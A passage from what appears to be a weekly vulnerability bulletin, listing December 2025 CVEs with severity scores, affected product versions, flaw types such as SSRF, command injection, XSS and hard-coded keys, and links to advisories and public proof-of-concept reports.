| YunaiV--yudao-cloud | A vulnerability was determined in YunaiV yudao-cloud up to 2025.11. This affects the function BpmHttpCallbackTrigger/BpmSyncHttpRequestTrigger of the component Business Process Management. Executing manipulation of the argument url/header/body can lead to server-side request forgery. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-26 | 6.3 | CVE-2025-15098 | VDB-338429 | YunaiV yudao-cloud Business Process Management BpmSyncHttpRequestTrigger server-side request forgery VDB-338429 | CTI Indicators (IOB, IOC, IOA) Submit #710170 | YunaiV YuDao Cloud <=v2025.11 Server-Side Request Forgery https://github.com/AnalogyC0de/public_exp/blob/main/archives/yudao-cloud-bpm_SSRF/report.md https://github.com/AnalogyC0de/public_exp/blob/main/archives/yudao-cloud-bpm_SSRF/report.md#proof-of-concept |
| ZKTeco--BioTime | A vulnerability was detected in ZKTeco BioTime up to 9.0.3/9.0.4/9.5.2. This affects an unknown part of the file /base/safe_setting/ of the component Endpoint. Performing manipulation of the argument backup_encryption_password_decrypt/export_encryption_password_decrypt results in unprotected storage of credentials. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 5.3 | CVE-2025-15128 | VDB-338506 | ZKTeco BioTime Endpoint safe_setting credentials storage VDB-338506 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711813 | ZkBioTime CMS 9.0.3, 9.0.4, 9.5.2 IDOR https://github.com/ionutluca888/IDOR-POC-ZKBio-Time/tree/main |
| ZSPACE--Z4Pro+ | A vulnerability was found in ZSPACE Z4Pro+ 1.0.0440024. Impacted is the function zfilev2_api_SafeStatus of the file /v2/file/safe/status of the component HTTP POST Request Handler. The manipulation results in command injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure. | 2025-12-28 | 6.3 | CVE-2025-15131 | VDB-338509 | ZSPACE Z4Pro+ HTTP POST Request status zfilev2_api_SafeStatus command injection VDB-338509 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713874 | ZSPACE Z4Pro+ v1.0.0440024 Command Injection https://github.com/LX-66-LX/cve/issues/1 |
| ZSPACE--Z4Pro+ | A vulnerability was determined in ZSPACE Z4Pro+ 1.0.0440024. The affected element is the function zfilev2_api_open of the file /v2/file/safe/open of the component HTTP POST Request Handler. This manipulation causes command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure. | 2025-12-28 | 6.3 | CVE-2025-15132 | VDB-338510 | ZSPACE Z4Pro+ HTTP POST Request open zfilev2_api_open command injection VDB-338510 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713885 | ZSPACE Z4Pro+ v1.0.0440024 Command Injection https://github.com/LX-66-LX/cve/issues/2 |
| ZSPACE--Z4Pro+ | A vulnerability was identified in ZSPACE Z4Pro+ 1.0.0440024. The impacted element is the function zfilev2_api_CloseSafe of the file /v2/file/safe/close of the component HTTP POST Request Handler. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure. | 2025-12-28 | 6.3 | CVE-2025-15133 | VDB-338511 | ZSPACE Z4Pro+ HTTP POST Request close zfilev2_api_CloseSafe command injection VDB-338511 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713887 | ZSPACE Z4Pro+ v1.0.0440024 Command Injection https://github.com/LX-66-LX/cve/issues/3 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| actiontech--sqle | A security vulnerability has been detected in actiontech sqle up to 4.2511.0. The impacted element is an unknown function of the file sqle/utils/jwt.go of the component JWT Secret Handler. The manipulation of the argument JWTSecretKey leads to use of hard-coded cryptographic key . The attack is possible to be carried out remotely. The attack's complexity is rated as high. The exploitability is regarded as difficult. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report and is planning to fix this flaw in an upcoming release. | 2025-12-27 | 3.7 | CVE-2025-15107 | VDB-338478 | actiontech sqle JWT Secret jwt.go hard-coded key VDB-338478 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710380 | https://github.com/actiontech https://github.com/actiontech/sqle ≤4.2511.0 Authentication Bypass by Primary Weakness https://github.com/actiontech/sqle/issues/3186 https://github.com/actiontech/sqle/milestone/53 |
| Axesstmc--Zucchetti Axess CLOKI Access Control | Zucchetti Axess CLOKI Access Control 1.64 contains a cross-site request forgery vulnerability that allows attackers to manipulate access control settings without user interaction. Attackers can craft malicious web pages with hidden forms to disable or modify access control parameters by tricking authenticated users into loading the page. | 2025-12-23 | 3.5 | CVE-2021-47722 | ExploitDB-50595 Product Web Page Zero Science Lab Disclosure (ZSL-2021-5689) VulnCheck Advisory: Zucchetti Axess CLOKI Access Control 1.64 Cross-Site Request Forgery |
| code-projects--Student Information System | A vulnerability was detected in code-projects Student Information System 1.0. This vulnerability affects unknown code of the file /profile.php. Performing manipulation of the argument firstname/lastname results in cross site scripting. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2025-12-24 | 3.5 | CVE-2025-15052 | VDB-337858 | code-projects Student Information System profile.php cross site scripting VDB-337858 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #720765 | Fabian Ros Student Information System In PHP With Source Code November 2, 2025 Cross Site Scripting https://github.com/i4G5d/CRITICAL-SECURITY-VULNERABILITY-REPORT-Stored-XSS https://code-projects.org/ |
| Dromara--Sa-Token | A weakness has been identified in Dromara Sa-Token up to 1.44.0. This affects the function ObjectInputStream.readObject of the file SaJdkSerializer.java. Executing manipulation can lead to deserialization. The attack may be launched remotely. This attack is characterized by high complexity. It is indicated that the exploitability is difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15117 | VDB-338495 | Dromara Sa-Token SaJdkSerializer.java ObjectInputStream.readObject deserialization VDB-338495 | CTI Indicators (IOB, IOC, IOA) Submit #711750 | github.com/dromara/Sa-Token Sa-Token <=1.44.0 Deserialization https://github.com/Yohane-Mashiro/Sa-Token-cve |
| getmaxun--maxun | A security flaw has been discovered in getmaxun maxun up to 0.0.28. Impacted is an unknown function of the file /getmaxun/maxun/blob/develop/server/src/routes/auth.ts. Performing manipulation of the argument api_key results in use of hard-coded cryptographic key . Remote exploitation of the attack is possible. The attack is considered to have high complexity. The exploitability is considered difficult. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-27 | 3.7 | CVE-2025-15105 | VDB-338476 | getmaxun auth.ts hard-coded key VDB-338476 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710256 | https://github.com/getmaxun https://github.com/getmaxun/maxun ≤ v0.0.28 Authentication Bypass by Primary Weakness https://gist.github.com/H2u8s/40be31987e52fc81076b6bfcfbdf3cd6 |
| Gitea--Gitea | In Gitea before 1.22.5, branch deletion permissions are not adequately enforced after merging a pull request. | 2025-12-26 | 3.1 | CVE-2025-68940 | https://blog.gitea.com/release-of-1.22.5/ https://github.com/go-gitea/gitea/releases/tag/v1.22.5 https://github.com/go-gitea/gitea/pull/32654 |
| Honor--Magic OS | ADB(Android Debug Bridge) is affected by type privilege bypass, successful exploitation of this vulnerability may affect service availability. | 2025-12-24 | 2.2 | CVE-2025-57840 | https://www.honor.com/global/security/cve-2025-57840 |
| IBM--Aspera Faspex 5 | IBM Aspera Faspex 5 5.0.0 through 5.0.14.1 may allow inconsistent permissions between the user interface and backend API allowed users to access features that appeared disabled, potentially leading to misuse. | 2025-12-26 | 3.8 | CVE-2025-36228 | https://www.ibm.com/support/pages/node/7255331 |
| IBM--Aspera Faspex 5 | IBM Aspera Faspex 5 5.0.0 through 5.0.14.1 could allow authenticated users to enumerate sensitive information of data due by enumerating package identifiers. | 2025-12-26 | 3.1 | CVE-2025-36229 | https://www.ibm.com/support/pages/node/7255331 |
| CouchCMS--CouchCMS | A security flaw has been discovered in CouchCMS up to 2.4. Affected is an unknown function of the file couch/config.example.php of the component reCAPTCHA Handler. The manipulation of the argument K_RECAPTCHA_SITE_KEY/K_RECAPTCHA_SECRET_KEY results in use of hard-coded cryptographic key . It is possible to launch the attack remotely. This attack is characterized by high complexity. The exploitability is told to be difficult. The exploit has been released to the public and may be exploited. | 2025-12-22 | 3.7 | CVE-2025-15005 | VDB-337711 | CouchCMS reCAPTCHA config.example.php hard-coded key VDB-337711 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718998 | https://github.com/CouchCMS/CouchCMS ≤ 2.4 Use of Hard-coded Cryptographic Key https://note-hxlab.wetolink.com/share/jNNcrdrNyCvl https://note-hxlab.wetolink.com/share/jNNcrdrNyCvl#-span--strong-proof-of-concept---strong---span- |
| Halo--Halo | A vulnerability was determined in Halo up to 2.21.10. This issue affects some unknown processing of the file /actuator of the component Configuration Handler. Executing manipulation can lead to information disclosure. The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15141 | VDB-338519 | Halo Configuration actuator information disclosure VDB-338519 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715235 | Halo 2.21.10 Exposure of Sensitive Information Due to Incompatible Policies https://github.com/SECWG/cve/issues/9 |
| JeecgBoot--JeecgBoot | A vulnerability was detected in JeecgBoot up to 3.9.0. This issue affects the function queryPageList of the file /sys/sysDepartRole/list. The manipulation of the argument deptId results in improper authorization. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is assessed as difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15119 | VDB-338497 | JeecgBoot list queryPageList improper authorization VDB-338497 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711771 | JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/32 |
| JeecgBoot--JeecgBoot | A flaw has been found in JeecgBoot up to 3.9.0. Impacted is the function getDeptRoleList of the file /sys/sysDepartRole/getDeptRoleList. This manipulation of the argument departId causes improper authorization. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitability is considered difficult. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15120 | VDB-338498 | JeecgBoot getDeptRoleList improper authorization VDB-338498 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711772 | JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/33 |
| JeecgBoot--JeecgBoot | A vulnerability was found in JeecgBoot up to 3.9.0. The impacted element is the function loadDatarule of the file /sys/sysDepartRole/datarule/. Performing manipulation of the argument departId/roleId results in improper authorization. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is regarded as difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15122 | VDB-338500 | JeecgBoot datarule loadDatarule improper authorization VDB-338500 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711774 | JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/35 |
| JeecgBoot--JeecgBoot | A vulnerability was determined in JeecgBoot up to 3.9.0. This affects an unknown function of the file /sys/sysDepartPermission/datarule/. Executing manipulation can lead to improper authorization. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15123 | VDB-338501 | JeecgBoot datarule improper authorization VDB-338501 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711775 | JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/36 |
| JeecgBoot--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.0. This impacts the function getParameterMap of the file /sys/sysDepartPermission/list. The manipulation of the argument departId leads to improper authorization. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitability is said to be difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15124 | VDB-338502 | JeecgBoot list getParameterMap improper authorization VDB-338502 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711776 | JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/37 |
| JeecgBoot--JeecgBoot | A security flaw has been discovered in JeecgBoot up to 3.9.0. Affected is the function queryDepartPermission of the file /sys/permission/queryDepartPermission. The manipulation of the argument departId results in improper authorization. The attack can be launched remotely. This attack is characterized by high complexity. The exploitability is told to be difficult. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15125 | VDB-338503 | JeecgBoot queryDepartPermission improper authorization VDB-338503 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711777 | JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/38 |
| JeecgBoot--JeecgBoot | A weakness has been identified in JeecgBoot up to 3.9.0. Affected by this vulnerability is the function getPositionUserList of the file /sys/position/getPositionUserList. This manipulation of the argument positionId causes improper authorization. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.1 | CVE-2025-15126 | VDB-338504 | JeecgBoot getPositionUserList improper authorization VDB-338504 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711782 | JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/39 |
| JeecgBoot--JeecgBoot | A vulnerability has been found in JeecgBoot up to 3.9.0. The affected element is the function getDeptRoleByUserId of the file /sys/sysDepartRole/getDeptRoleByUserId. Such manipulation of the argument departId leads to information disclosure. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 2.4 | CVE-2025-15121 | VDB-338499 | JeecgBoot getDeptRoleByUserId information disclosure VDB-338499 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711773 | JeecgBoot 3.9.0 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/34 |
| OpenCart--OpenCart | A security flaw has been discovered in OpenCart up to 4.1.0.3. Affected by this issue is some unknown functionality of the component Single-Use Coupon Handler. Performing manipulation results in race condition. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 3.7 | CVE-2025-15116 | VDB-338494 | OpenCart Single-Use Coupon race condition VDB-338494 | CTI Indicators (IOB, IOC) Submit #711745 | OpenCart 4.1.0.3 Time-of-check Time-of-use https://gist.github.com/KhanMarshaI/a55f125a55de1c0d4f41e66236027e01 https://gist.github.com/KhanMarshaI/a55f125a55de1c0d4f41e66236027e01#steps-to-reproduce |
| PbootCMS--PbootCMS | A weakness has been identified in PbootCMS up to 3.2.12. Impacted is an unknown function of the file /data/pbootcms.db of the component SQLite Database. Executing manipulation can lead to files or directories accessible. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is considered difficult. The exploit has been made available to the public and could be exploited. Modifying the configuration settings is advised. | 2025-12-28 | 3.7 | CVE-2025-15153 | VDB-338531 | PbootCMS SQLite Database pbootcms.db file access VDB-338531 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #719814 | PbootCMS 3.2.12 SQLite Database File Disclosure https://note-hxlab.wetolink.com/share/ALC1iSa8J56A |
| PandaXGO--PandaX | A vulnerability was detected in PandaXGO PandaX up to fb8ff40f7ce5dfebdf66306c6d85625061faf7e5. This affects an unknown function of the file config.yml of the component JWT Secret Handler. The manipulation of the argument key results in use of hard-coded cryptographic key . The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is reported as difficult. The exploit is now public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-27 | 3.7 | CVE-2025-15108 | VDB-338479 | PandaXGO PandaX JWT Secret config.yml hard-coded key VDB-338479 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711519 | https://github.com/PandaXGO https://github.com/PandaXGO/PandaX before commit fb8ff40f7ce5dfebdf66306c6d85625061faf7e5 (As of December 10, 2025) Authentication Bypass by Primary Weakness https://github.com/PandaXGO/PandaX/issues/9 |
| postmanlabs--httpbin | A security vulnerability has been detected in postmanlabs httpbin up to 0.6.1. This affects an unknown function of the file httpbin-master/httpbin/core.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-26 | 3.5 | CVE-2025-15095 | VDB-338424 | postmanlabs httpbin core.py cross site scripting VDB-338424 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #709002 | postmanlabs httpbin <=0.6.1 XSS https://github.com/postmanlabs/httpbin/issues/735 |
| rawchen--ecms | A vulnerability has been found in rawchen ecms up to b59d7feaa9094234e8aa6c8c6b290621ca575ded. Affected by this vulnerability is the function updateProductServlet of the file src/servlet/product/updateProductServlet.java of the component Add New Product Page. The manipulation of the argument productName leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 2.4 | CVE-2025-15149 | VDB-338526 | rawchen ecms Add New Product updateProductServlet.java updateProductServlet cross site scripting VDB-338526 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716583 | https://github.com/rawchen/ecms?tab=readme-ov-file ecms 1.0 Stored XSS https://github.com/zyhzheng500-maker/cve/blob/main/%E5%AD%98%E5%82%A8%E5%9E%8BXss.md |
| SohuTV--CacheCloud | A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. This affects the function doTotalList of the file src/main/java/com/sohu/cache/web/controller/TotalManageController.java. Such manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 2.4 | CVE-2025-15145 | VDB-338523 | SohuTV CacheCloud TotalManageController.java doTotalList cross site scripting VDB-338523 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716301 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/365 https://github.com/sohutv/cachecloud/issues/365#issue-3733522215 |
| SohuTV--CacheCloud | A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. This impacts the function doUserList of the file src/main/java/com/sohu/cache/web/controller/UserManageController.java. Performing manipulation results in cross site scripting. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 2.4 | CVE-2025-15146 | VDB-338524 | SohuTV CacheCloud UserManageController.java doUserList cross site scripting VDB-338524 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716302 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/366 https://github.com/sohutv/cachecloud/issues/366#issue-3733542570 |
| TaleLin--Lin-CMS | A vulnerability was determined in TaleLin Lin-CMS up to 0.6.0. This affects an unknown part of the file /tests/config.py of the component Tests Folder. This manipulation of the argument username/password causes password in configuration file. The attack is possible to be carried out remotely. The complexity of an attack is rather high. It is indicated that the exploitability is difficult. The exploit has been publicly disclosed and may be utilized. | 2025-12-28 | 3.7 | CVE-2025-15151 | VDB-338528 | TaleLin Lin-CMS Tests Folder config.py password in configuration file VDB-338528 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721893 | https://doc.cms.talelin.com/ Lin-CMS 0.6.0 weak password https://github.com/m3ngx1ng/cve/blob/4690d4020a4a642af4c50912f762937292228641/lin-cms.md |
| TOZED--ZLT M30s | A vulnerability was determined in TOZED ZLT M30s up to 1.47. The affected element is an unknown function of the component UART Interface. Executing manipulation can lead to on-chip debug and test interface with improper access control. The physical device can be targeted for the attack. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 2 | CVE-2025-15083 | VDB-338411 | TOZED ZLT M30s UART on-chip debug and test interface with improper access control VDB-338411 | CTI Indicators (IOB, IOC) Submit #707974 | TOZED ZLT M30s 1.47 Improper Access Control in Debug Interface https://hacklab.eu.org/blogs/zlt_m30s_debug_interface |
| youlaitech--youlai-mall | A vulnerability was identified in youlaitech youlai-mall 1.0.0/2.0.0. The impacted element is the function orderService.payOrder of the file mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java of the component Order Payment Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitability is regarded as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 3.1 | CVE-2025-15084 | VDB-338412 | youlaitech youlai-mall Order Payment OrderController.java orderService.payOrder access control VDB-338412 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708174 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/24 |
| yourmaileyes--MOOC | A security flaw has been discovered in yourmaileyes MOOC up to 1.17. This affects the function subreview of the file mooc/controller/MainController.java of the component Submission Handler. Performing manipulation of the argument review results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 3.5 | CVE-2025-15134 | VDB-338512 | yourmaileyes MOOC Submission MainController.java subreview cross site scripting VDB-338512 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713955 | yourmaileyes MOOC V1.17 Improper Neutralization of Alternate XSS Syntax https://github.com/yourmaileyes/MOOC/issues/12 https://github.com/yourmaileyes/MOOC/issues/12#issue-3722197285 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 10up--Eight Day Week Print Workflow | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in 10up Eight Day Week Print Workflow eight-day-week-print-workflow allows Retrieve Embedded Sensitive Data.This issue affects Eight Day Week Print Workflow: from n/a through <= 1.2.5. | 2025-12-24 | not yet calculated | CVE-2025-67621 | https://vdp.patchstack.com/database/Wordpress/Plugin/eight-day-week-print-workflow/vulnerability/wordpress-eight-day-week-print-workflow-plugin-1-2-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| 6Storage--6Storage Rentals | Server-Side Request Forgery (SSRF) vulnerability in 6Storage 6Storage Rentals 6storage-rentals allows Server Side Request Forgery. This issue affects 6Storage Rentals: from n/a through <= 2.19.9. | 2025-12-24 | not yet calculated | CVE-2025-67623 | https://vdp.patchstack.com/database/Wordpress/Plugin/6storage-rentals/vulnerability/wordpress-6storage-rentals-plugin-2-19-9-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| abhinavxd--libredesk | Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta. | 2025-12-27 | not yet calculated | CVE-2025-68927 | https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4 https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb |
| Academy Software Foundation--OpenEXR | Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27946. | 2025-12-23 | not yet calculated | CVE-2025-12495 | ZDI-25-989 |
| Academy Software Foundation--OpenEXR | Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27947. | 2025-12-23 | not yet calculated | CVE-2025-12839 | ZDI-25-990 |
| Academy Software Foundation--OpenEXR | Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27948. | 2025-12-23 | not yet calculated | CVE-2025-12840 | ZDI-25-991 |
| Addonify--Addonify | Missing Authorization vulnerability in Addonify Addonify addonify-quick-view allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify: from n/a through <= 2.0.4. | 2025-12-24 | not yet calculated | CVE-2025-68578 | https://vdp.patchstack.com/database/Wordpress/Plugin/addonify-quick-view/vulnerability/wordpress-addonify-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve |
| Alessandro Piconi--Simple Keyword to Link | Cross-Site Request Forgery (CSRF) vulnerability in Alessandro Piconi Simple Keyword to Link simple-keyword-to-link allows Cross Site Request Forgery. This issue affects Simple Keyword to Link: from n/a through <= 1.5. | 2025-12-24 | not yet calculated | CVE-2025-68573 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-keyword-to-link/vulnerability/wordpress-simple-keyword-to-link-plugin-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| AMP-MODE--Review Disclaimer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AMP-MODE Review Disclaimer review-disclaimer allows Stored XSS.This issue affects Review Disclaimer: from n/a through <= 2.0.3. | 2025-12-24 | not yet calculated | CVE-2025-67628 | https://vdp.patchstack.com/database/Wordpress/Plugin/review-disclaimer/vulnerability/wordpress-review-disclaimer-plugin-2-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| apiDoc--apidoc-core | Prototype pollution vulnerability in apidoc-core versions 0.2.0 and all subsequent versions allows remote attackers to modify JavaScript object prototypes via malformed data structures, including the "define" property processed by the application, potentially leading to denial of service or unintended behavior in applications relying on the integrity of prototype chains. This affects the preProcess() function in api_group.js, api_param_title.js, api_use.js, and api_permission.js worker modules. | 2025-12-26 | not yet calculated | CVE-2025-13158 | https://www.sonatype.com/security-advisories/cve-2025-13158 |
| Assaf Parag--Poll, Survey & Quiz Maker Plugin by Opinion Stage | Missing Authorization vulnerability in Assaf Parag Poll, Survey & Quiz Maker Plugin by Opinion Stage social-polls-by-opinionstage allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Poll, Survey & Quiz Maker Plugin by Opinion Stage: from n/a through <= 19.12.1. | 2025-12-24 | not yet calculated | CVE-2025-68594 | https://vdp.patchstack.com/database/Wordpress/Plugin/social-polls-by-opinionstage/vulnerability/wordpress-poll-survey-quiz-maker-plugin-by-opinion-stage-plugin-19-12-1-broken-access-control-vulnerability?_s_id=cve |
| Automattic--WoooCommerce | A vulnerability in WooCommerce 8.1 to 10.4.2 can allow logged-in customers to access order data of guest customers on sites with a certain configuration. This has been fixed in WooCommerce 10.4.3, as well as all the previously affected versions through point releases, starting from 8.1, where it has been fixed in 8.1.3. It does not affect WooCommerce 8.0 or earlier. | 2025-12-22 | not yet calculated | CVE-2025-15033 | https://wpscan.com/vulnerability/f55fd7d3-7fbe-474f-9406-f47f8aee5e57/ |
| Basticom--Basticom Framework | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basticom Basticom Framework basticom-framework allows Stored XSS. This issue affects Basticom Framework: from n/a through <= 1.5.2. | 2025-12-24 | not yet calculated | CVE-2025-67629 | https://vdp.patchstack.com/database/Wordpress/Plugin/basticom-framework/vulnerability/wordpress-basticom-framework-plugin-1-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| bdthemes--Prime Slider Addons For Elementor | Server-Side Request Forgery (SSRF) vulnerability in bdthemes Prime Slider - Addons For Elementor bdthemes-prime-slider-lite allows Server Side Request Forgery. This issue affects Prime Slider - Addons For Elementor: from n/a through <= 4.0.10. | 2025-12-24 | not yet calculated | CVE-2025-68500 | https://vdp.patchstack.com/database/Wordpress/Plugin/bdthemes-prime-slider-lite/vulnerability/wordpress-prime-slider-addons-for-elementor-plugin-4-0-10-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Ben Balter--WP Document Revisions | Missing Authorization vulnerability in Ben Balter WP Document Revisions wp-document-revisions allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Document Revisions: from n/a through <= 3.7.2. | 2025-12-24 | not yet calculated | CVE-2025-68585 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-document-revisions/vulnerability/wordpress-wp-document-revisions-plugin-3-7-2-broken-access-control-vulnerability?_s_id=cve |
